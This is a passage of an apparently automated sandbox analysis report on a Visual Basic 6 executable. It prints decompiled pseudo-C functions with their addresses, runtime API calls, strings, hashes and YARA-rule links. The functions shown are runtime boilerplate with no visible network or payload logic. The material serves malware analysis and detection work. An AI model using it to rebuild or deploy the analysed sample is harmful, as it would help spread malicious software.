					_v52 = _t46;
					_v60 = 8;
					L004015FE();
					L004016AC();
				}
				asm("wait");
				_push(0x410b71);
				L0040167C();
				return _t46;
			}
























                                  0x00410a13
                                  0x00410a1e
                                  0x00410a1f
                                  0x00410a28
                                  0x00410a29
                                  0x00410a31
                                  0x00410a34
                                  0x00410a3b
                                  0x00410a40
                                  0x00410a45
                                  0x00410a4a
                                  0x00410a4f
                                  0x00410a55
                                  0x00410a57
                                  0x00410a58
                                  0x00410a65
                                  0x00410a7f
                                  0x00410a67
                                  0x00410a67
                                  0x00410a6c
                                  0x00410a71
                                  0x00410a76
                                  0x00410a76
                                  0x00410a86
                                  0x00410a8b
                                  0x00410a9a
                                  0x00410a9d
                                  0x00410a9f
                                  0x00410aa6
                                  0x00410abf
                                  0x00410abf
                                  0x00410abf
                                  0x00410aa8
                                  0x00410aa8
                                  0x00410aaa
                                  0x00410aaf
                                  0x00410ab2
                                  0x00410ab5
                                  0x00410aba
                                  0x00410aba
                                  0x00410ac6
                                  0x00410ac9
                                  0x00410ad0
                                  0x00410ade
                                  0x00410ae8
                                  0x00410ae9
                                  0x00410aea
                                  0x00410aeb
                                  0x00410af4
                                  0x00410af7
                                  0x00410af9
                                  0x00410b00
                                  0x00410b19
                                  0x00410b19
                                  0x00410b19
                                  0x00410b02
                                  0x00410b02
                                  0x00410b04
                                  0x00410b09
                                  0x00410b0c
                                  0x00410b0f
                                  0x00410b14
                                  0x00410b14
                                  0x00410b20
                                  0x00410b23
                                  0x00410b27
                                  0x00410b2a
                                  0x00410b2d
                                  0x00410b3a
                                  0x00410b42
                                  0x00410b42
                                  0x00410b47
                                  0x00410b48
                                  0x00410b6b
                                  0x00410b70

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410A29
                                  • __vbaR8Str.MSVBVM60(00402BFC,?,?,?,?,004014F6), ref: 00410A40
                                  • __vbaFPFix.MSVBVM60(00402BFC,?,?,?,?,004014F6), ref: 00410A45
                                  • __vbaFpR8.MSVBVM60(00402BFC,?,?,?,?,004014F6), ref: 00410A4A
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,00402BFC,?,?,?,?,004014F6), ref: 00410A71
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000001C), ref: 00410AB5
                                  • __vbaChkstk.MSVBVM60(?), ref: 00410ADE
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,0000005C), ref: 00410B0F
                                  • __vbaVarMove.MSVBVM60(00000000,?,00402C00,0000005C), ref: 00410B3A
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402C00,0000005C), ref: 00410B42
                                  • __vbaFreeVar.MSVBVM60(00410B71,00402BFC,?,?,?,?,004014F6), ref: 00410B6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkFreeHresult$MoveNew2
                                  • String ID: <3A
                                  • API String ID: 2954588148-662753744
                                  • Opcode ID: acdc06c7067b5c4e79c78952a41f3223d1d651e81ddc73e7b40f3ba35da4f7da
                                  • Instruction ID: 91ab73dbc7f50e04df06f56762162d0eccffb6428cf5f008e7505d43692a8ced
                                  • Opcode Fuzzy Hash: acdc06c7067b5c4e79c78952a41f3223d1d651e81ddc73e7b40f3ba35da4f7da
                                  • Instruction Fuzzy Hash: 1B41E471940308EFDB00EFD5C945BDDBBB5BF08709F24442AE401BB2A1C7B96985DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411565, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00411565(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				void* _t54;
				char* _t55;
				signed int _t59;
				signed int _t63;
				signed int _t69;
				void* _t82;
				intOrPtr _t84;

				 *[fs:0x0] = _t84;
				_t54 = 0x3c;
				L004014F0();
				_v12 = _t84;
				_v8 = 0x4013d8;
				L00401622();
				_t55 =  &_v24;
				L00401652();
				_v48 = _t55;
				_t59 =  *((intOrPtr*)( *_v48 + 0x1c))(_v48,  &_v44, _t55, _t54, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, __ecx, __ecx, _t82);
				asm("fclex");
				_v52 = _t59;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402ba8);
					_push(_v48);
					_push(_v52);
					L004016B2();
					_v68 = _t59;
				}
				_v56 =  ~(0 | _v44 != 0x00000000);
				L004016AC();
				_t63 = _v56;
				if(_t63 != 0) {
					if( *0x41333c != 0) {
						_v72 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v72 = 0x41333c;
					}
					_v48 =  *_v72;
					_t69 =  *((intOrPtr*)( *_v48 + 0x4c))(_v48,  &_v24);
					asm("fclex");
					_v52 = _t69;
					if(_v52 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40275c);
						_push(_v48);
						_push(_v52);
						L004016B2();
						_v76 = _t69;
					}
					_v56 = _v24;
					_v32 = 1;
					_v40 = 2;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t63 =  *((intOrPtr*)( *_v56 + 0x2c))(_v56, 0x10);
					asm("fclex");
					_v60 = _t63;
					if(_v60 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x2c);
						_push(0x402b78);
						_push(_v56);
						_push(_v60);
						L004016B2();
						_v80 = _t63;
					}
					L004016AC();
				}
				_push(0x4116d0);
				return _t63;
			}
























                                  0x00411576
                                  0x0041157f
                                  0x00411580
                                  0x00411588
                                  0x0041158b
                                  0x00411592
                                  0x00411598
                                  0x0041159c
                                  0x004115a1
                                  0x004115b0
                                  0x004115b3
                                  0x004115b5
                                  0x004115bc
                                  0x004115d5
                                  0x004115be
                                  0x004115be
                                  0x004115c0
                                  0x004115c5
                                  0x004115c8
                                  0x004115cb
                                  0x004115d0
                                  0x004115d0
                                  0x004115e4
                                  0x004115eb
                                  0x004115f0
                                  0x004115f6
                                  0x00411603
                                  0x0041161d
                                  0x00411605
                                  0x00411605
                                  0x0041160a
                                  0x0041160f
                                  0x00411614
                                  0x00411614
                                  0x00411629
                                  0x00411638
                                  0x0041163b
                                  0x0041163d
                                  0x00411644
                                  0x0041165d
                                  0x00411646
                                  0x00411646
                                  0x00411648
                                  0x0041164d
                                  0x00411650
                                  0x00411653
                                  0x00411658
                                  0x00411658
                                  0x00411664
                                  0x00411667
                                  0x0041166e
                                  0x00411678
                                  0x00411682
                                  0x00411683
                                  0x00411684
                                  0x00411685
                                  0x0041168e
                                  0x00411691
                                  0x00411693
                                  0x0041169a
                                  0x004116b3
                                  0x0041169c
                                  0x0041169c
                                  0x0041169e
                                  0x004116a3
                                  0x004116a6
                                  0x004116a9
                                  0x004116ae
                                  0x004116ae
                                  0x004116ba
                                  0x004116ba
                                  0x004116bf
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411580
                                  • #685.MSVBVM60(?,?,?,?,004014F6), ref: 00411592
                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,004014F6), ref: 0041159C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402BA8,0000001C,?,?,?,?,?,?,?,?,?,004014F6), ref: 004115CB
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004115EB
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041160F
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000004C), ref: 00411653
                                  • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00411678
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402B78,0000002C), ref: 004116A9
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004116BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$ChkstkFree$#685New2
                                  • String ID: <3A
                                  • API String ID: 2284028277-662753744
                                  • Opcode ID: 59a24c8eb8c09914505a2594c654f7ec9098300aab92c951b3fb310e00900e43
                                  • Instruction ID: c5018991d703d1f90882d248a1c89bc8bb4524730cbac4a0e81379d9c8f7e79e
                                  • Opcode Fuzzy Hash: 59a24c8eb8c09914505a2594c654f7ec9098300aab92c951b3fb310e00900e43
                                  • Instruction Fuzzy Hash: 93411770D10208EFCB00EFA5D949FDEBBB5BF08714F14842AF501B72A1D7B959819B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041205F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E0041205F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _t51;
				signed int _t56;
				void* _t65;
				void* _t67;
				intOrPtr _t68;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				L004014F0();
				_v16 = _t68;
				_v12 = 0x401498;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4014f6, _t65);
				L004016A6();
				if( *0x41333c != 0) {
					_v68 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x40276c);
					L004016B8();
					_v68 = 0x41333c;
				}
				_t11 =  &_v68; // 0x41333c
				_v44 =  *((intOrPtr*)( *_t11));
				_t51 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t51;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40275c);
					_push(_v44);
					_push(_v48);
					L004016B2();
					_v72 = _t51;
				}
				_v52 = _v36;
				_t56 =  *((intOrPtr*)( *_v52 + 0x118))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t56;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x40277c);
					_push(_v52);
					_push(_v56);
					L004016B2();
					_v76 = _t56;
				}
				L00401664();
				_v32 = _t56;
				L004016AC();
				_push(0x41217d);
				L0040169A();
				return _t56;
			}






















                                  0x00412062
                                  0x00412071
                                  0x0041207b
                                  0x00412083
                                  0x00412086
                                  0x0041208d
                                  0x0041209c
                                  0x004120a5
                                  0x004120b1
                                  0x004120cb
                                  0x004120b3
                                  0x004120b3
                                  0x004120b8
                                  0x004120bd
                                  0x004120c2
                                  0x004120c2
                                  0x004120d2
                                  0x004120d7
                                  0x004120e6
                                  0x004120e9
                                  0x004120eb
                                  0x004120f2
                                  0x0041210b
                                  0x004120f4
                                  0x004120f4
                                  0x004120f6
                                  0x004120fb
                                  0x004120fe
                                  0x00412101
                                  0x00412106
                                  0x00412106
                                  0x00412112
                                  0x00412121
                                  0x00412127
                                  0x00412129
                                  0x00412130
                                  0x0041214c
                                  0x00412132
                                  0x00412132
                                  0x00412137
                                  0x0041213c
                                  0x0041213f
                                  0x00412142
                                  0x00412147
                                  0x00412147
                                  0x00412153
                                  0x00412158
                                  0x0041215f
                                  0x00412164
                                  0x00412177
                                  0x0041217c

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041207B
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004120A5
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,?,?,?,004014F6), ref: 004120BD
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,00000014), ref: 00412101
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040277C,00000118), ref: 00412142
                                  • __vbaI2I4.MSVBVM60 ref: 00412153
                                  • __vbaFreeObj.MSVBVM60 ref: 0041215F
                                  • __vbaFreeStr.MSVBVM60(0041217D), ref: 00412177
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckFreeHresult$ChkstkCopyNew2
                                  • String ID: <3A
                                  • API String ID: 746201682-662753744
                                  • Opcode ID: 1efd8d754c942c52c8691889703f3c418ea0092f02e486f67e4a6d485f0c1d68
                                  • Instruction ID: 8169d3cb59670e2856737a2354a9e947c648973332a80ce632e6eaf0cb714ec2
                                  • Opcode Fuzzy Hash: 1efd8d754c942c52c8691889703f3c418ea0092f02e486f67e4a6d485f0c1d68
                                  • Instruction Fuzzy Hash: 4531D271900218EFCB01EFA5CA85FDDBBB4BF08704F14842AE501B72A1CBB99995DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041126C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0041126C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				short _v72;
				signed int _t21;
				char* _t25;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t38 = _t37 - 0xc;
				 *[fs:0x0] = _t38;
				L004014F0();
				_v16 = _t38;
				_v12 = 0x4013a8;
				_v8 = 0;
				_t21 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4014f6, _t35);
				_push(0x402ce4);
				L004015BC();
				L0040161C();
				_push(_t21);
				_push(0x402cf0);
				L00401694();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t21));
				L0040169A();
				_t25 = _v72;
				if(_t25 != 0) {
					_v60 = L"Ledekort8";
					_v68 = 8;
					L00401634();
					_t25 =  &_v52;
					_push(_t25);
					L004015B6();
					L0040167C();
				}
				asm("wait");
				_push(0x41132b);
				return _t25;
			}
















                                  0x0041126f
                                  0x0041127e
                                  0x00411288
                                  0x00411290
                                  0x00411293
                                  0x0041129a
                                  0x004112a9
                                  0x004112ac
                                  0x004112b1
                                  0x004112bb
                                  0x004112c0
                                  0x004112c1
                                  0x004112c6
                                  0x004112cd
                                  0x004112d3
                                  0x004112da
                                  0x004112df
                                  0x004112e5
                                  0x004112e7
                                  0x004112ee
                                  0x004112fb
                                  0x00411300
                                  0x00411303
                                  0x00411304
                                  0x0041130c
                                  0x0041130c
                                  0x00411311
                                  0x00411312
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411288
                                  • #713.MSVBVM60(00402CE4,?,?,?,?,004014F6), ref: 004112B1
                                  • __vbaStrMove.MSVBVM60(00402CE4,?,?,?,?,004014F6), ref: 004112BB
                                  • __vbaStrCmp.MSVBVM60(00402CF0,00000000,00402CE4,?,?,?,?,004014F6), ref: 004112C6
                                  • __vbaFreeStr.MSVBVM60(00402CF0,00000000,00402CE4,?,?,?,?,004014F6), ref: 004112DA
                                  • __vbaVarDup.MSVBVM60 ref: 004112FB
                                  • #529.MSVBVM60(?), ref: 00411304
                                  • __vbaFreeVar.MSVBVM60(?), ref: 0041130C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#529#713ChkstkMove
                                  • String ID: Ledekort8
                                  • API String ID: 3668040345-3639059750
                                  • Opcode ID: c0160b4f651a1969a598b7a7f90448031f38327c73100c0f14b7182fcb30dae4
                                  • Instruction ID: dec9fdc259d9f764bcba8b48a29db6139e0a1328ff91c128b8486ef1c922852d
                                  • Opcode Fuzzy Hash: c0160b4f651a1969a598b7a7f90448031f38327c73100c0f14b7182fcb30dae4
                                  • Instruction Fuzzy Hash: 5D112E70950209ABDB10EBA5CD45FEDBBB8BF04B04F50452BF801B71E1DB7C59458B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410B84, Relevance: 15.1, APIs: 10, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00410B84(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a40, void* _a44) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v40;
				char _v48;
				char _v64;
				char* _t24;
				intOrPtr _t40;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x40);
				L004014F0();
				_v12 = _t40;
				_v8 = 0x401368;
				L004016A6();
				L004016A6();
				_v40 = 2;
				_v48 = 2;
				_push( &_v48);
				_push( &_v64);
				L004015F2();
				_push( &_v64);
				L004015F8();
				L0040161C();
				_push( &_v64);
				_t24 =  &_v48;
				_push(_t24);
				_push(2);
				L00401676();
				_push(0x410c3a);
				L0040169A();
				L0040169A();
				L0040169A();
				return _t24;
			}













                                  0x00410b89
                                  0x00410b94
                                  0x00410b95
                                  0x00410b9c
                                  0x00410b9f
                                  0x00410ba7
                                  0x00410baa
                                  0x00410bb7
                                  0x00410bc2
                                  0x00410bc7
                                  0x00410bce
                                  0x00410bd8
                                  0x00410bdc
                                  0x00410bdd
                                  0x00410be5
                                  0x00410be6
                                  0x00410bf0
                                  0x00410bf8
                                  0x00410bf9
                                  0x00410bfc
                                  0x00410bfd
                                  0x00410bff
                                  0x00410c07
                                  0x00410c24
                                  0x00410c2c
                                  0x00410c34
                                  0x00410c39

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410B9F
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410BB7
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410BC2
                                  • #613.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410BDD
                                  • __vbaStrVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410BE6
                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410BF0
                                  • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,?,?,?,?,?,?,?,?,004014F6), ref: 00410BFF
                                  • __vbaFreeStr.MSVBVM60(00410C3A), ref: 00410C24
                                  • __vbaFreeStr.MSVBVM60(00410C3A), ref: 00410C2C
                                  • __vbaFreeStr.MSVBVM60(00410C3A), ref: 00410C34
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CopyMove$#613ChkstkList
                                  • String ID:
                                  • API String ID: 2801890994-0
                                  • Opcode ID: 553b681cbcf2366df822d10d372f4801ad619da3d508798f565cb544fa848b77
                                  • Instruction ID: c53932276c2290fa7b3e208bcd3d396e9a0bbe8b8653e6c18e4914566233327c
                                  • Opcode Fuzzy Hash: 553b681cbcf2366df822d10d372f4801ad619da3d508798f565cb544fa848b77
                                  • Instruction Fuzzy Hash: 3C115171C00108ABCB04EBD5CD46EEEB77CEB44704F54852EF501771E1EB7969058B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410167, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00410167(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				void* _v28;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v44;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _t41;
				signed int _t46;
				intOrPtr _t55;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_push(0x2c);
				L004014F0();
				_v12 = _t55;
				_v8 = 0x4012d0;
				if( *0x41333c != 0) {
					_v56 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x40276c);
					L004016B8();
					_v56 = 0x41333c;
				}
				_t5 =  &_v56; // 0x41333c
				_v36 =  *((intOrPtr*)( *_t5));
				_t41 =  *((intOrPtr*)( *_v36 + 0x14))(_v36,  &_v28);
				asm("fclex");
				_v40 = _t41;
				if(_v40 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40275c);
					_push(_v36);
					_push(_v40);
					L004016B2();
					_v60 = _t41;
				}
				_v44 = _v28;
				_t46 =  *((intOrPtr*)( *_v44 + 0x118))(_v44,  &_v32);
				asm("fclex");
				_v48 = _t46;
				if(_v48 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x40277c);
					_push(_v44);
					_push(_v48);
					L004016B2();
					_v64 = _t46;
				}
				L00401664();
				_v24 = _t46;
				L004016AC();
				_push(0x41025f);
				return _t46;
			}


















                                  0x0041016c
                                  0x00410177
                                  0x00410178
                                  0x0041017f
                                  0x00410182
                                  0x0041018a
                                  0x0041018d
                                  0x0041019b
                                  0x004101b5
                                  0x0041019d
                                  0x0041019d
                                  0x004101a2
                                  0x004101a7
                                  0x004101ac
                                  0x004101ac
                                  0x004101bc
                                  0x004101c1
                                  0x004101d0
                                  0x004101d3
                                  0x004101d5
                                  0x004101dc
                                  0x004101f5
                                  0x004101de
                                  0x004101de
                                  0x004101e0
                                  0x004101e5
                                  0x004101e8
                                  0x004101eb
                                  0x004101f0
                                  0x004101f0
                                  0x004101fc
                                  0x0041020b
                                  0x00410211
                                  0x00410213
                                  0x0041021a
                                  0x00410236
                                  0x0041021c
                                  0x0041021c
                                  0x00410221
                                  0x00410226
                                  0x00410229
                                  0x0041022c
                                  0x00410231
                                  0x00410231
                                  0x0041023d
                                  0x00410242
                                  0x00410249
                                  0x0041024e
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410182
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,?,?,?,004014F6), ref: 004101A7
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,00000014,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004101EB
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040277C,00000118,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041022C
                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041023D
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410249
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$ChkstkFreeNew2
                                  • String ID: <3A
                                  • API String ID: 1616694062-662753744
                                  • Opcode ID: 0d0cbbac460fc2b5aad24defca012c8900940b76b7943e5ceb70ae1a575669c2
                                  • Instruction ID: b0e1464bb917f2b9fcc6a6dbebddb85b2e60aaa7f7e13f4728a67a549d93d9f1
                                  • Opcode Fuzzy Hash: 0d0cbbac460fc2b5aad24defca012c8900940b76b7943e5ceb70ae1a575669c2
                                  • Instruction Fuzzy Hash: 6031E771D00208AFCF00EF95C989FDEBBB5AB08714F10806AF101B72A1DBB959849B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411C38, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00411C38(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v48;
				char* _t18;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004014F0();
				_v16 = _t29;
				_v12 = 0x401418;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4014f6, _t26);
				_push(L"10:10:10");
				_push( &_v48);
				L00401592();
				_t18 =  &_v48;
				_push(_t18);
				L004015F8();
				L0040161C();
				L0040167C();
				_push(0x411cba);
				L0040169A();
				return _t18;
			}












                                  0x00411c3b
                                  0x00411c4a
                                  0x00411c54
                                  0x00411c5c
                                  0x00411c5f
                                  0x00411c66
                                  0x00411c75
                                  0x00411c78
                                  0x00411c80
                                  0x00411c81
                                  0x00411c86
                                  0x00411c89
                                  0x00411c8a
                                  0x00411c94
                                  0x00411c9c
                                  0x00411ca1
                                  0x00411cb4
                                  0x00411cb9

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411C54
                                  • #541.MSVBVM60(?,10:10:10,?,?,?,?,004014F6), ref: 00411C81
                                  • __vbaStrVarMove.MSVBVM60(?,?,10:10:10,?,?,?,?,004014F6), ref: 00411C8A
                                  • __vbaStrMove.MSVBVM60(?,?,10:10:10,?,?,?,?,004014F6), ref: 00411C94
                                  • __vbaFreeVar.MSVBVM60(?,?,10:10:10,?,?,?,?,004014F6), ref: 00411C9C
                                  • __vbaFreeStr.MSVBVM60(00411CBA,?,?,10:10:10,?,?,?,?,004014F6), ref: 00411CB4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$FreeMove$#541Chkstk
                                  • String ID: 10:10:10
                                  • API String ID: 296236968-2228564956
                                  • Opcode ID: 6cadc1b10fb22bf432f28a4db7f2309cda367cf7d0f62dad3c4d74b8936981fd
                                  • Instruction ID: 42f8add41d1de2a3f76836baf00971d110792bcf72e763ba5c9cf3e3252cd90a
                                  • Opcode Fuzzy Hash: 6cadc1b10fb22bf432f28a4db7f2309cda367cf7d0f62dad3c4d74b8936981fd
                                  • Instruction Fuzzy Hash: A3016271940208ABCB00EBA5CD46FDEBB78AF44744F50843AF101B71F1D77895048B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411CE1, Relevance: 12.1, APIs: 8, Instructions: 91COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00411CE1(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				intOrPtr _v60;
				char _v68;
				signed int _v72;
				char _v80;
				signed int _v84;
				void* _t26;
				signed int _t29;
				signed int _t30;
				intOrPtr _t39;

				_push(__ecx);
				_push(__ecx);
				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t39;
				_t26 = 0x40;
				L004014F0();
				_v12 = _t39;
				_v8 = 0x401460;
				_push(0x402e00);
				L00401586();
				_push(_t26);
				_push( &_v36);
				L0040158C();
				_v60 = 0x402e0c;
				_v68 = 0x8008;
				_push( &_v36);
